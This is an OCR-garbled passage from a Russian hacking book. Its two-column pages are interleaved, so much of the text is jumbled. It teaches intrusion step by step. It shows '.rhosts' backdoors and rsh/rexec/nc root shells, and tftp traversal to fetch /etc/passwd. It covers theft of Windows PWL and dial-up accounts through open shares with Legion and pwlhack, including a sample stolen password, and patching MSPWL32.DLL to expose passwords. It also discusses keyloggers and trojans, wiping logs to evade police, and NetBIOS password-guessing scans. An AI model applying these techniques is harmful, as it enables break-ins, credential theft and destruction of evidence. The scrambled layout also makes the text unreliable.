2750 Apr 7 1993 .rootmenu записали версию sendmail’a — программы,
rwrr 1 dolbilov dolbilov содержащей легендарное количество
478 Apr 7 1993 .sunview ошибок. Не будем заострять на них
rw 1 dolbilov dolbilov внимания.
2196 Oct 30 1995 mbox
drwxrxrx 2 dolbilov dolbilov Новые версии выходят регулярно, старые
512 Nov 25 1994 timezone ошибки исправляются, появляются новые.
$ echo '+ +' > .rhosts
$ exit 6. tftp
devil# rsh l dolbilov tftp широко известная программа
thsun1.xxxx.xxxxx.su /bin/csh i похожая на ftp, служит для простейшего
$ трансфера файлов. Ошибки в ней
Таким образом мы получили shell на известны и исправлены в большинстве
удаленной машине. ОС, но и нижеследующий пример можно
встретить:
5. sendmail
devil# tfp www.xxx.ru
devil# telnet www.xxx.ru 25
tftp> get
Trying 193.124.xxx.xx…
/tmp/../../../../../../../../../etc/pa
Connected to www.xxx.ru.
sswd /tmp/passwd
Escape character is '^]'.
tftp> quit

127 128
Хакинг с самого начала Хакинг с самого начала

devil# Login failed.


7. ftp ftp> quote pasv
421 Service not available, remote
Сервис ftp является не только server has closed connection
удобным, но и опасным для вашей ftp> o xxxxxxxxxxx.xxx.com
системы. Опасность представляет не Connected to xxxxxxxxxxx.xxx.com.
только возможность украсть доверенную 220 xxxxxxxxxxx FTP server (UNIX(r)
информацию или занести свою при System V Release 4.0) ready.
неправильной конфигурации демона. Name (xxxxxxxxxxx.xxx.com:root): ftp
Опасность представляет возможное 331 Guest login ok, send ident as
крушение демона командами пользователя. password.
devil# ftp xxxxxxxxxxx.xxx.com Password:
Connected to xxxxxxxxxxx.xxx.com. 230 Guest login ok, access
220 xxxxxxxxxxx FTP server (UNIX(r) restrictions apply.
System V Release 4.0) ready. ftp> bin
Name (xxxxxxxxxxx.xxx.com:root): ftp 200 Type set to I.
331 Guest login ok, send ident as ftp> get core
password. 200 PORT command successful.
Password: 150 Binary data connection for core
230 Guest login ok, access (194.хх.ххх.ххх,51553)
restrictions apply. (281136 bytes).
ftp> user root 226 Binary Transfer complete.
530 User root unknown. local: core remote: core
Login failed. 281136 bytes received in 16 seconds
ftp> user root (17 Kbytes/s)
530 User root unknown. ftp> bye
Login failed. 221 Goodbye.
ftp> user foobar devil#
530 User foobar access denied. /********** Fragment of core

129 130
Хакинг с самого начала Хакинг с самого начала

************/ Приведем только наиболее важные


….994:..S.:. порты:
srk:__a2U/fw.FWhk:….::::..S
harat:__mQb7Pij8mrA:….::::..S@ X server
kchu:__/sPKnswJ8y2:9….::::..S` X сервер базируется на портах 6000
yhew:__0/L6foNhPoA:9….:::: ..S. + номер дисплея. Если Х сервер не
:h6qh9see7ry .M:9353:….:. использует для аутентификации magic
pa ..S.WGZ/NEzsLjwe 2:9097::….. cookies или защита отключена командой
flo ..S.Xbra.0mg/PMc :9097:::…. xhost +, информация с его дисплеев может
dave ..S.0VnE0zICamE: 9097::::…. быть подсмотрена или украдена, нажатия
on:2 ..T.VqQO2BOU:909 7::::::…..: клавиш записаны, программы запущены
/************************************* удаленно (xspy, xpush). Если хост
***/ поддерживает соединение к 6000 порту, то
Мы заменили первые два символа это может быть использовано для
каждого пароля на «__». denial_of_service атак.

7. rexd rlogin и talkd


devil# su daemon В большинстве систем эти сервисы
$ on i faxnetxx.xxx.ru /bin/sh i имеют ошибки, связанные с
$ uname a переполнением буфера. rlogin пытается
faxnetxx faxnetxx 3.2 2 i386 получить от удаленной системы
$ id переменную TERM, а talkd — узнать имя
uid=1(daemon) gid=1(other) хоста, требующего соединение. Если эти
$ демоны получают в ответ строку большой
длинны, то происходит переполнение
8. Сканирование портов.
буфера. Это дает возможность выполнить
Портмэппер сообщает только о rpc удаленно команды с привилегиями root.
сервисах. Об остальных запущенных
сервисах можно узнать прямым
сканированием портов.

131 132
Хакинг с самого начала Хакинг с самого начала

rsh и rexec наиболее часто заходят пользователи,


rsh и rexec позволяют получить особенно администраторы, просматривая
командную оболочку не оставляя записей права на доступ к NFS разделам.
в log
файлах. Кроме того, эти сервисы не Использование доверительных отношений
отслеживают запрет на удаленный root создает определенное удобство, но вместе
логин (/etc/default/login). с тем порождает опасность проникновения
devil# rsh l smtp xxxx.xxx.ru в систему злоумышленников. Взломщик
/bin/csh i может исказить информацию в DNS или
Warning: no access to tty; thus no NIS сервере и выдавать себя за
job control in this shell… доверенный хост.
# id
uid=0(root) gid=0(root) Как получить доступ к
devil# nc v xxxx.xxx.ru 512
xxxx.xxx.ru [194.85.xxx.xxx] 512 удаленному компьютеру
(exec) open
^@root^@rootpasswd^@/bin/csh i^@ Использование
Warning: no access to tty; thus no EssentialNetTools 2.2
job control in this shell… Получить доступ к удаленному
# id компьютеру, то есть к любому компьютеру
uid=0(root) gid=1(other) в Internet или локальной сети можно,
9. Доверенные хосты. используя самую продуманную и
распространенную в кругах хакеров
Обычно, работая в пределах одной
программу EssentialNetTools 2.2. Для
группы, пользователям разрешается без
начала нужно наметить жертву. Легче
пароля входить на соседние компьютеры.
всего поддаются «обработке» хозяева
Такие доверительные машины
нескольких компьютеров, объединённых в
указываются в файлах .rhosts и hosts.equiv.
домашнюю локальную сеть. Чтобы не
Предположить, какие хосты являются
бегать с дискетами с одного компа на
доверенными, можно отслеживая откуда
другой, они расшаривают винты обоих

133 134
Хакинг с самого начала Хакинг с самого начала

компьютеров для обмена данными по их достучаться, жмёшь Add Record. Теперь у


сетке. Они и не подозревают, что также тебя есть три пути. Во
первых, можно:
как и они, данными с ними может Пуск ➪ Найти Компьютер, пишешь имя
обмениваться кто угодно из всемирной или IP адрес нужного компьютера и
паутины (pwl, user.dar, system.dat и.т.д.). смотришь его через проводник. Второй
Еще хорошо работать с университетскими вариант: ты можешь сделать тоже самое в
компами, они также часто висят на окне NBScan, нажав на правую кнопку
локальной сети с доступом в Internet, и мыши и выбрав Open Computer. И,
несут на себе такой же отпечаток наконец, ты можешь подключить ресурсы
ущербности Microsoft, как и домашние как удалённые сетевые диски, используя
локалки. закладку Share. В поле Share Name вводите
информацию в виде «\\имя
Теперь ближе к телу
компьютера\папка» разумеется, без
(EssentialNetTools скачаны и установлены).
кавычек, жмёте Mount.
Первая закладка NBScan сканирует
заданный тобой диапазон IP на предмет Наиболее оптимальным считается
компьютеров с открытыми для доступа подключение удалённого сетевого диска,
папками, дисками. Найдя компьютер, в что позволяет достигать наивысшей
графе RS которого стоит YES, копируешь скорости обмена данными.
его IP во вторую закладку NATShell
Кстати NetTool (те, что Essential)
(starting ip = ending ip), use default NAT list
работают только месяц после установки,
не должно быть помечено. Жмёшь Go и
но эта такая клёвая программа, что ради
идёшь ползать по сети (если защита
этого не жалко переместить системное
слабая, то долго ждать не придётся). Если
время на год назад (всё будет работать,
удастся установить связь, будет выдан
только во время сканирования NBScan
список доступных ресурсов и какие из них
нельзя наводить мышь на появляющиеся
доступны для записи. Далее открываешь
компы и работать с закладками лучше по
закладку LMHost и вносишь в
очереди, для надёжности).
соответствующие поля IP и имя
компьютера, до которого удалось

135 136
Хакинг с самого начала Хакинг с самого начала

Бесплатный Internet указанного индивидуума он, чаще всего,


нес определенную смысловую нагрузку. И
Все изложенное ниже предназначено было в этом слабое место данного метода.
только для ознакомления с возможной Теперь только в дешевых фильмах можно
опасностью и ни в коем случае не должно увидеть некоего гражданина, копающегося
быть использовано, если это причинит в мусорной корзине своей жертвы в
ущерб каким
либо физическим или надежде узнать имена, фамилии, даты
юридическим лицам. Это может повлечь рождения всех родственников таковой
за собой административную или вплоть до десятого колена, а также клички
уголовную ответственность в соответствии всех их собак, кошек, крыс, хомяков и
с действующим законодательством. тараканов. А как же еще: что тебе,
например, первым приходит на ум?
Во все времена были люди, которые
Конечно: имя твоей (а чаще не твоей)
старались что
либо утаить от других. Но
подружки или кличка замученного
были и другие: те, которые с этим были не
домашнего животного, ну или слово какое
согласны и всячески старались тайны
непотребное. Наиболее продвинутые
первых узнать. И вот придумали первые
хакеры начали составлять специальные
вход в Internet с паролем, ибо денег сие
словари с учетом наиболее часто
удовольствие стоит, а вторые сразу начали
встречающихся в паролях слов.
этот пароль отыскивать всеми
возможными и невозможными способами. Все это, в конце концов, положило
конец первой стадии и началась вторая:
Когда
то давно пароль пользователь
теперь компьютер генерирует некоторую
мог выбирать сам. С одной стороны, это
псевдослучайную последовательность букв,
было очень удобно: если сам слово
цифр и разных знаков препинания.
заветное это придумал, то уж не забудешь
Хорошо
то как стало: «Lta13?Lp» —
никогда (если только пребывал в этот
попробуй подбери! Но тут возникла другая
момент в здравом уме и твердой памяти,
проблема: а попробуй
ка запомни!
но это уже к делу не относится). Пароль
Пользователи наши начали их на
же выбирался не просто так: для
бумажках записывать, ну и периодически…

137 138
Хакинг с самого начала Хакинг с самого начала

правильно: бумажки терялись, соответствует логину данного юзверя. Эти


похищались, попадали в мусорную файлы, в принципе, зашифрованы
корзину и т.д. — от чего ушли, к тому и достаточно прилично. Если кому
либо
пришли! И тогда какая
то умная голова интересно, то, взяв в руки какой
нибудь
догадалась, что пароль можно хранить не в дизассемблер (HIEW, QVIEW), можно
голове, а прямо на жестком диске. В посмотреть процедуру шифрования. Она
DialUp
окне галочку поставить и находится в файле MSPWL32.DLL. Там
запомнить пароль. У компьютера мозги все очень накручено. Имеется счетчик
кремниевые — ему все равно, что (назовем его N) от нуля до «сколько
запоминать. Ну, а раз запомнили, то, само надо». Имеются три таблицы. В
собой, и записать надо. Ну, а раз записать, соответствии со счетчиком N берется байт
то… правильно: отвернулся наш из первой таблицы (X). По смещению
пользователь, а тут толпа голодных до X+N, урезанному до 8 бит, из второй
Internet хакеров налетела — и пароль таблицы берется другой байт (Y). Затем по
подсмотрела… И тогда пароли стали адресу X+Y, опять же урезанному до 8
шифровать. бит, из третьей таблицы берется третий
байт (Z). После столь хитрых
Интимные подробности манипуляций командой XOR с байтом Z
Где же хранятся пароли в Windows шифруется байт информации, после чего
95/98? Известно где, зашифрованные счетчик инкрементируется, и все
пароли в Windows 95/98 хранятся в повторяется сначала (как тебе, а?). Как
основном каталоге, в файлах с формируются сами таблицы? Не знаю
расширением PWL. С учетом того, что не (мне было лень выяснять).
только «у нас здесь», но и «у них там» Расшифровывается все это аналогично
бывают персональные компьютеры (той же процедурой), ибо команда XOR
коллективного пользования, да и сети обратима. То, какие Винды у тебя стоят —
локальные местами встречаются (правда, значения не меняет. Не знаю уж, в чьих
редко), на каждого пользователя заводится нездоровых мозгах могла появиться мысль
свой PWL. Кстати, название файла использовать для шифрования команду xor

139 140
Хакинг с самого начала Хакинг с самого начала

byte ptr [eax+ebp],cl. Может, запутать пользователей могут возникнуть лишние


хотели? Но команда уникальна, такие вопросы и подозрения.
команды в обычных программах еще
Я все так и сделал, скажешь ты, а
поискать надо. Стало быть, ищем
вот тот юзер в Windows с паролем входил,
соответствующую ей комбинацию 30h,
а мне теперь не войти — пароля
то я не
0Ch, 28h — и все дела. Дальше — просто.
знаю. Что делать? Не беда! Есть способ
Берем MSPWL32.DLL и, со смещения
проще! Уносим только USER.DAT! А
511h (или там, где найдем), ставим 90h,
теперь: Windows 95 — M. D.! Как тебе
90h, 90h — команды NOP (пустая
должно быть известно, кроме
операция). И все, команда не
интерактивного доступа в Internet,
выполняется! Что при этом произойдет?
провайдеры еще и e
mail впаривают
Да ничего! Ничего страшного и даже не
суповым набором. Так вот, чтобы залезть в
очень страшного. И даже никто ничего не
твой почтовый ящик, в тот, что у тебя в
заметит!!! Все останется как всегда, с
подъезде, нужен ключ (или лом). Чтобы
одним лишь исключением: все
залезть в твой e
mail, нужен пароль (или
логины/пароли будут видны, так сказать,
виртуальный лом). И тут я скажу: все
невооруженным глазом!
поголовно провайдеры в славном городе
Тут, правда, есть два неприятных Москве — M. D.! Пароль к POP3
ящику
момента. Во
первых, во время работы всегда тот же, что и DialUp! Ну и что? А
Windows тебе не удастся подобным вот что. Пароль e
mail находится не в
образом надругаться над их «святая PWL’е, а в USER.DAT, и зашифрован он
святых»: писать в этот файл нельзя. не так сильно, вернее, почти совсем не
Значит, придется перегружаться в режиме зашифрован! А это как??? Да вот так!
эмуляции MS
DOS, а это лишнее время, Метод «шифрования» напоминает
которого может не быть. элементарное UUE
кодирование, иначе
говоря, из трех байтов делают четыре или
Во
вторых, а это еще хуже, тебе надо
из 8 битов — 10. Весь исходный пароль
будет стереть все PWL’ы, иначе даже в
разбивается на части по три байта. В
Windows не пустят: а вот тут у законных
результирующей строке на один символ

141 142
Хакинг с самого начала Хакинг с самого начала

отводится 10 битов. Теперь к каждому символов. С подбором третьего символа


байту исходной строки прибавляется 30h, все четыре байта должны совпасть! Если
если сумма больше, чем 7Ah, то он нет — извини, no sex for you. Естественно,
становится равен 30h, а к паре 9 и 10 после каждой замены символа жми
битов добавляется единица. Однако есть «Применить». Результат контролируем
исключения. Если общая длина строки REGEDIT’ом, переходя вверх/вниз для
пароля не кратна трем, то она дополняется обновления информации. Когда первые
байтами 3Dh. Судя по всему, это 0Dh три символа подобраны, возвращаемся к
(конец строки) + 30h. В конце строки (*) для следующих трех и т.д. до победного
0Dh, 0Ah: стандартное завершение. На конца. Разумеется, байт(ы) 3Dh подбирать
мой взгляд, подобрать пароль вручную не нужно! После некоторой тренировки на
проще, чем написать соответствующую все это уходит минут 15.
программу: не каждый же день ты эти
Где же это счастье хранится? И,
пароли подбираешь! Где находится пароль
вообще, кроме логина и пароля еще
— написано ниже, оттуда его и берем. А
многое нужно знать, а откуда, не звонить
принцип прост: запускаем Internet Mail,
же провайдеру? Не надо никому звонить!
заходим в Сообщение & reg; Параметры ➪
Все в нем, в USER.DAT.
Сервер. Запускаем REGEDIT, переходим в
HKEY_CURRENT_USER/Software/Microsof HKEY_CURRENT_USER/RemoteAcce
t/InternetMail and News/Mail/POP3/Твой ss/Addresses: и мы имеем список
сервер: смотрим Password. Удаляем пароль подключений. Да, но там ничего не видно,
в Internet Mail. Первый подбираемый цифры какие
то… А ты чего хотел,
символ влияет на первый и второй байты, дружок! Выбираем байт, которого больше
второй — на второй и третий, третий — на всего, и дешифруем им все остальные
третий и четвертый. Теперь подбираем (обычный XOR). В результате в куче
символ так, чтобы первый байт совпал с всякой ерунды получаем ASCII
строку с
оригиналом, а второй или совпал, или был номером модемного телефона провайдера
самый большой, но меньше оригинала. (потеть, конечно, придется, если друг
Аналогично для второго и третьего совсем не знакомый или работает

143 144
Хакинг с самого начала Хакинг с самого начала

партизаном, а знакомого и спросить Существуют программы типа SPYWIN,


можно — типа: «Что это за провайдер у или HOOKDUMP, или KEYWITNESS.
тебя такой не хилый, друг ты мой лучший, Они записывают все действия,
Миша»?). производимые на компьютере. Достаточно
HKEY_CURRENT_USER/RemoteAccess/Profile подсадить одну из них и все…
/"подключение"/IP: со смещения 0Ch Естественно, их можно использовать и для
четыре байта задом наперед — это других не менее интересных целей.
первичный DNS, затем еще четыре  И в конце могу тебе посоветовать: не
вторичный и т.д. качай и уж тем более не запускай у себя
HKEY_CURRENT_USER/RemoteAccess/Profile всякие «взломщики Internet». Они могут
/ "подключение"/User: логин. крякнуть только информацию на твоем
HKEY_CURRENT_USER/Software/Microsoft/ винчестере! Ибо тот, кто может взломать
Windows/CurrentVersion/InternetSetting провайдера, никогда не будет опускаться
s/ProxyServer: Proxyсервер и порт. до таких мелочей, а другие в лучшем
HKEY_CURRENT_USER/Software/Microsoft/I случае хотят над тобой просто посмеяться,
nternetMail and News/Mail: в худшем — сделать бяку.
DefaultPOP3Server:
DefaultSMTPServer: А знаешь ли ты, друг мой, о том, как
SenderEMail: хакеры «вытаскивают» твои драгоценные
Name: аккаунты прямо у тебя из
под носа?
Organization: это все и так Существует достаточно много случаев,
понятно. когда пользователь с удивлением для себя
POP3  "POP3сервер": обнаруживает, что за его счет бродит по
Account: это понятно просторам Internet кто
то еще и,
Password: ну вот и он, родимый естественно, тратит направо и налево его
потом и кровью заработанные деньги.
Что делать, если пользователь —
Обнаружив столь неприятное
мазохист? Не хранит он пароль в
происшествие, он в ярости (или в
компьютере, а вводит его каждый раз с
недоумении — кто как) звонит в
клавиатуры? И этому горю можно помочь.

145 146
Хакинг с самого начала Хакинг с самого начала

техподдержку своего провайдера и адресов одной сетки. Что для этого


объясняет причину своего недовольства. нужно? Для Windows 95/98/NT —
Провайдер приносит свои соболезнования, программа «Legion». После запуска этой
но, к сожалению, ничем помочь не может, программы нужно указать IP
адреса,
однако, предлагает сменить пользователю которые будут использоваться для
пароль и советует не допускать до сканирования. Сначала хакер выбирает
компьютера тех людей, которые не предполагаемого провайдера, услугами
достойны доверия. А самое главное, что которого впоследствии он будет
тем людям, которые платят свои деньги за пользоваться. Например, это будет
часы, проведенные в Internet, провайдер выдуманный нами провайдер
не собирается возмещать ни денег, ни www.lamerishe.ru. Запустив свой mIRC, он
времени. Разочаровавшись и обвиняя во отправляется на всем знакомый IRC и в
всех мнимых грехах техническую окошке «status» пишет: /whois
поддержку, ты размышляешь о том, как *.lamerishe.ru.
же этому гадскому хакеру удалось украсть
Ответ не заставит себя ждать:
твой аккаунт, и с обидой в душе на этот
жестокий мир подумываешь о смене #RUSSIAN Andrey H andrey@dialup
провайдера. Итак, каким же образом хакер 28059.lamerishe.ru :0 hello.
смог «вытащить» твой аккаунт? *.junk.com
End of /WHO list.
На сегодняшний день мне известны
Дальше следует команда:
несколько методов, которые используют
хакеры. Обычно многие юзеры, /dns Andrey
устанавливая Windows 95/98/NT под сети, И mIRC выдает ему IP
шник
предоставляют доступ к своим дискам и жертвы:
директориям другим пользователям сети, *** Looking up dialup
тем самым открывая лазейку в свой 28059.lamerishe.ru
компьютер. Для того чтобы в сети найти *** Resolved dialup
компьютер с такой лазейкой, хакеру 28059.lamerishe.ru to 121.31.21.10
необходимо просканировать диапазон IP

147 148
Хакинг с самого начала Хакинг с самого начала

Вот он уже и знает один из IP


в каталоге Windows. И поэтому хакер
адресов (121.31.21.10) нашего выдуманного заходит в «Пуск ➪ Программы ➪ Сеанс
провайдера. Теперь нужно указать MSDOS». Пишет там «e:» и нажимает
диапазон IP
адресов этого провайдера. Enter. Теперь он на жестком диске у
Хакер запускает Legion и заполняет поля чайника. Но каталог Windows может
«Enter Start IP» (введите начальный IP) и называться по
другому. Поэтому он
«Enter End IP» (введите конечный IP). пишет: E:\>dir win* и получает такой вот
Enter Start IP: 121.31.21.1 ответ:
Enter End IP: 121.31.21.254 Том в устройстве Е не имеет метки
Остается только выбрать скорость Серийный номер тома: 224715D0
соединения и нажать на кнопку «Scan». Содержимое каталога Е:\
Если после сканирования, в правом окне WIN95 <КАТАЛОГ> 113098 6:48p WIN95
сканера, появится 0 файл(а,ов) 0 байт
что
то вроде «\\121.31.21.87\C», то в 1 каталог(а,ов) 287,997,952 байт
левом окне можно открыть этот IP и свободно
щелкнуть два раза на ответвлении «C». Дальше следуют команды:
Появится сообщение «MAPPED ON E:\>cd win95
DRIVE E:». Все это означает, что на E:\WIN95>dir *.pwl
данном IP есть машина, c незашаренным Том в устройстве Е не имеет метки
(то есть открытым для всех) диском С. И Серийный номер тома: 224715D0
этот диск можно установить как еще один Содержимое каталога Е:\WIN95
диск на своем компе. То есть у хакера на ANDREY PWL 730 020599 10:31p
компе появится еще один диск (в данном ANDREY.PWL
случае — Е), по которому он будет лазить, 1 файл(а,ов) 730 байт
как по своему собственному, хотя он и 0 каталог(а,ов) 287,997,952 байт
находится на удаленной машине. Конечно, свободно
главной целью для хакера является файл с E:\WIN95>copy andrey.pwl
расширением .pwl, в котором находится c:\hacking\pwlhack
зашифрованный аккаунт. Этот файл лежит

149 150
Хакинг с самого начала Хакинг с самого начала

Теперь, после копирования файла с по просторам всемирной паутины Internet.


расширением .pwl, хакеру нужно А вот и сам аккаунт:
отсоединиться от этого компьютера. Он Имя пользователя: L5tRe
открывает иконку «Мой компьютер», Пароль: fsa3Xfa12
выбирает иконку E:\121.31.21.87\C, нажав
Если у данного провайдера можно
правую кнопку мыши. Там жмет
посмотреть статистику прямо из Internet,
«Отсоединить». Что теперь? А теперь он
то, обычно, хакеры посещают сайт
берет программу pwlhack и с помощью нее
провайдера (в нашем примере
расшифровывает добытый файл andrey.pwl.
www.lamerishe.ru) и смотрят, сколько
C:\HACKING\PWLHACK>pwlhack.exe /list осталось денег на счету у пользователя и в
andrey.pwl andrey какое время он обычно находится в
(C) 17Apr1998y by Hard Wisdom Internet. Кстати, телефоны модемных
"PWL's Hacker" v3.0 (1996,97,98) пулов также можно узнать на сайте у
Enter the password: провайдера.
File 'ANDREY.PWL' has size 730
bytes, version [NEW_Win95_OSR/2] Существует еще несколько иных
for user 'ANDREY' with password '' способов, таких как использование
contains: троянов Netbus1.0, Netbus Pro 2.0,
[Type][The resource location BackOrifice и т.д. Самый простой из всех
string][Password] способов заключается в том, что, зная IP

Dial X *Rna\Соединение с адрес с открытыми сетевыми ресурсами,


lamerishe\L5tRe fsa3Xfa12 можно соединиться с компьютером, нажав
 на Пуск, выбрав «Поиск компьютера» и
 указав IP
адрес.
Indexed Entryes: 1; Number of «Все. Систему я понял. Теперь
resources: 1. объясни
ка мне, как устранить лазейку и
Настает кульминационный момент! защитить себя от непрошеных гостей?» —
Итак, теперь с помощью аккаунта, скажешь ты. Хорошо. Для защиты от
добытого у «чайника», хакер может лазить описанной выше дырки тебе будет

151 152
Хакинг с самого начала Хакинг с самого начала

необходимо отключить привязку (службу него никуда. Это блок бесперебойного


доступа к файлам и принтерам) от питания. Чтобы когда в доме вырубят
контроллера удаленного доступа (лезь в свет, ты успел все прочистить. Во
первых,
Панель управления ➪ Сеть), а в Windows сотри все файлы с паролями, хакерский
NT нужно запретить службу Server в софт, history аськи и так далее. Но просто
Remote Access WAN Wrapper. Но от стереть мало. На самом деле когда ты
НетБаса, БэкОрифиса и подобных троянов «стираешь» файл, на харде он помечается
это тебя не спасет. А вот чтобы не как «удаленный», и когда места перестанет
подхватить трояна, во
первых, никогда не хватать, он новую инфу запишет поверх
подпускай никого к своему компьютеры него. Так, конечно, не во всех файловых
со всякими дискетками, а, системах, но в большинстве. Для
во
вторых, никогда не запускай у себя на затирания пустого места тебе необходима
компе никаких программ, в которых ты программа под названием PGPErase. Она
хоть на грамм сомневаешься. Последним входит в комплект PGP, который можно
хакерским способом по рассылке троянов скачать на сайте PGPi (где
то в районе
был массовый спаминг с хоста девяти метров). Вообще PGP — классная
microsoft.com, где в каждом письме лежал штука (хотя недавно для нее был написан
якобы патч к 4
му IE. Ну, а что этот кряк). Особо полезны утилиты PGPErase,
«патч» делал, я думаю, ты уже догадался. PGPDisc и PGPMail. Про PGPErase мы
говорили. PGPDisc — это утилитка для
создания виртуального диска. Как она
Чистим логи действует. Ты создаешь папку, которая
В этот раз мы напишем про то, как потом станет диском. Запускаешь
прочистить логи на своем компе. Надо это PGPDisc, он ее зашифровывает и
для того, чтобы когда к тебе в квартиру помещает в файл *.pgd. Диск этот
вломятся друзья дворника (ОМОН), они изначально «невидимый». Чтобы он
ничего не смогли обнаружить на твоем активизировался, надо набрать
винте. Начнем с того, что тебе надо в офигительный шифр. В случае чего, его
срочном порядке приобрести UPS. Без можно вырубить клавишами Ctrl+F12.

153 154
Хакинг с самого начала Хакинг с самого начала

PGPMail служит для шифрования Вот так вот все просто. Но, надеюсь,
почтовых сообщений. что ты себе такой файл делать не будешь.
Для добавления строчек надо сделать все
Теперь прочистим реестр. Сделать
так же, только вместо слова Del написать
это достаточно легко. Просто удаляешь
слово Add и после адреса ключа
строчки со спертыми данными и все. Но
вписывать:
мы с тобой сейчас попробуем
автоматизировать этот процесс. Сначала 0,"параметр"
надо все это дело сохранить в каком
Но просто так ты инфы не
нибудь файле, после чего склепать из него запустишь. Допустим, у тебя INF
файл
два файла INF (для загрузки всего этого в называется CSU.INF (хотя я, конечно,
реестр и удаления из него). Для понимаю, что я обнаглел). Тогда его надо
автоматизации этой работы советую будет запускать командой:
скачать маленькую программку по адресу RUNDLL.EXE
http://www.xakep.ru/soft/5/reg2inf.exe. Как SETUPX.DLL,InstallHinfSection
склепать все ручонками, думаю, ты DefaultInstall 64 c:\csu.inf
знаешь. Например, чтобы INF
файл
Все. Больше мы — не твоя стартовая
удалял из твоего реестра запись о том, что
страничка. Дальше надо вытереть файлы
CSU — твоя домашняя страничка, код
USER.DA0 и SYSTEM.DA0 (это что
то
должен быть таким:
типа backup’а реестра). Я бы посоветовал
[Version] написать батник, убивающий эти файлы и
Signature="$…$" заодно прочищающий реестр. То есть,
LayoutFile=bla.inf если твой файл для вырезания строчек из
реестра называется CSU.INF, а для
[DefaultInstall] добавления в реестр инфы CSUADD.INF,
DelReg=del.Reg то батник будет выглядеть следующим
образом:
[del.Reg]
RUNDLL.EXE
HKCU,"SOFTWARE\Microsoft\Internet
SETUPX.DLL,InstallHinfSection
Explorer\main","Home Page"
155 156
Хакинг с самого начала Хакинг с самого начала

DefaultInstall 64 csu.inf позволило добиться неожиданно


ATTRIB H R S «хороших» результатов.
C:\WINDOWS\SYSTEM.DA0
ATTRIB H S =R C:\WINDOWS\USER.DA0 Алгоритм сканирования
DEL C:\WINDOWS\SYSTEM.DA0 Сканирование выполняется
DEL C:\WINDOWS\USER.DA0 параллельно для каждого из заданных
Следующим делом надо просмотреть адресов (при наличии достаточных
файлы USER.DAT и ресурсов у атакующего). Сканируется сеть
SYSTEM.DAT (реестр) через какой
нибудь класса C, кроме 1.2.3.0 и 1.2.3.255.
HEX
редактор. Там тоже есть много твоих
паролей. Их заменять надо на что угодно, Первая стадия — сбор данных
лишь бы такой же длины. Еще хороший ■ Послать запрос ping. Если нет
способ — пустить поиск файлов по ответа, то пропустить этот
содержащейся в них строчке. А лично я адрес (и не атаковать эту
свои логи никогда не чищу, а просто машину на второй стадии).
храню всю опасную для моей свободы ■ Определить имя DNS (на
инфу на отдельном винте, и подсоединяю всякий случай, оно нигде не
его только когда это мне необходимо. используется)
■ Попробовать установить null
Сканирование shared.ресурсов session.
в Internet ■ Попробовать получить список
shared resources.
В результате экспериментов с
NetBIOS был реализован метод ■ Если null session установить не
сканирования Internet в поисках открытых удалось, то закончить первую
для записи разделяемых (shared) ресурсов. стадию для этого адреса.
Подобная идея уже применялась в Legion,
■ Попробовать получить список
но простое дополнение этой схемы
имен пользователей.
простейшим алгоритмом подбора паролей
157 158
Хакинг с самого начала Хакинг с самого начала

■ Попробовать получить GetTickCount() в десятичном


информацию об операционной представлении) и пустым
системе, а именно: паролем. Если подключение
успешно, то считать, что
■ Платформу (Windows 9x,
разрешено подключение Guest,
Windows NT).
и дальнейшие проверки
■ Версию LAN Manager паролей будут бессмысленны.
(Для NT: 4.00 — NT4, Проверить shared resources и
5.00 — Windows 2000). больше не подбирать пароли
■ на эту машину.
Роль системы в сети:
флаги Master Browser, ■ Проверить подключения со
Backup Browser, PDC, всеми именами, собранными
BDC, RAS dialin server. на первой стадии. Проверяется
пустой пароль и пароль,
Вторая стадия — подбор паролей
совпадающий с именем
Все имена пользователей, пользователя. Если
полученные на первой стадии, подключение успешно, то
объединяются в один список, что проверить shared resources.
позволяет учесть доменную архитектуру
систем на базе Windows NT. На этой Защита
стадии проверяются соединения типа net
Атака может быть предотвращена
use \\1.2.3.4\IPC$ password /user:username.
следующими методами:
Если соединение успешно, то проверяются
все возможности подключения ко всем ■ отключением NetBIOS over
shared resources, и, когда подключение TCP/IP
успешно, возможность записи. ■ запретом доступа к портам 135
■ Проверить подключение со и 139 при помощи firewall
случайным именем
(используется результат
159 160
Хакинг с самого начала Хакинг с самого начала

■ запретом анонимного доступа неуспешных попытках входа с разными


к системе путем установки в 1 именами пользователей (в том числе и тех,
значения ключа которых нет на этой машине; по две
HKLM\System\CurrentControlS записи на имя). Если среди них есть хотя
et\ бы одна запись об успешном входе,
Control\Lsa\RestrictAnonymous систему следует считать
скомпрометированной.
■ выбором устойчивых паролей
■ запретом пользователя Guest Реализация
или введением для него login Для проверки метода была написана
station restrictions программа, реализующая вышеописанный
■ специальными программными алгоритм (это заняло около 6 часов вместе
средствами с тестированием и перерывами на
покурить). Тестовые сканирования
Введение account lockout смысла, проводились на Dual Celeron 400MHz
скорее всего, не имеет, поскольку 96Mb RAM с одновременным запуском до
проводятся всего две попытки угадать 128 потоков.
пароль.
Стандартное протоколирование Статистика
доступа методами NT не позволяет Был проведен ряд
установить IP атакующего (только экспериментальных сканирований. В
NetBIOS имя машины и домен, которые качестве источника адресов подсетей был
могут быть произвольно изменены). использован Intruders list, полученный при
Однако протокол позволяет помощи BlackICE, однако разработка
идентифицировать прошедшую атаку: алгоритма быстрого определения
сначала идет одна запись об успешном «населенных» подсетей не представляет
входе в систему пользователя никакой сложности.
ANONYMOUS, а потом (после паузы
Сканирование 254 адресов занимает
около минуты) серия записей о
от двух до десяти минут в зависимости от
161 162
Хакинг с самого начала Хакинг с самого начала

качества связи и общего количества имен Null session установлено с 102


пользователей в сети. 6.7%
Guest разрешен1 57
Кратко сформулированный результат
3.7%
такой:
Уязвимых машин2 45
■ примерно 10% паролей 3.0%
пользователей Windows может ■ 1 — Т.е. возможно
быть угадано с двух попыток подключение к IPC$ со
■ примерно 40% Windows
случайным именем
машин, доступных по NetBIOS ■ 2 — Уязвимыми считались все
over TCP/IP, выставляют машины, которые позволяли
ресурсы в общее пользование подключить разделяемый
без (достаточной) защиты ресурс хотя бы на чтение.
■ примерно каждая третья share, Распределение платформ
доступная из Internet, Всего успешных запросов 102 100%
разрешает запись Windows 95/98 58 57%
Кроме того: за два часа не очень Windows NT или SAMBA 44 43%
напряженной работы можно найти три Пользователи
машины с Windows NT, к которым можно Всего имен проверено 177 100%
подключиться по сети с правами С пустым паролем 10 6%
администратора (CONNECT: Administrator: С паролем, совпадающим
<NO PASSWORD>. с именем 10 6%
Детальная статистика Shared resources
Всего адресов просканировано 1524 Всего директорий 278 100%
100% Доступно на чтение 171 62%
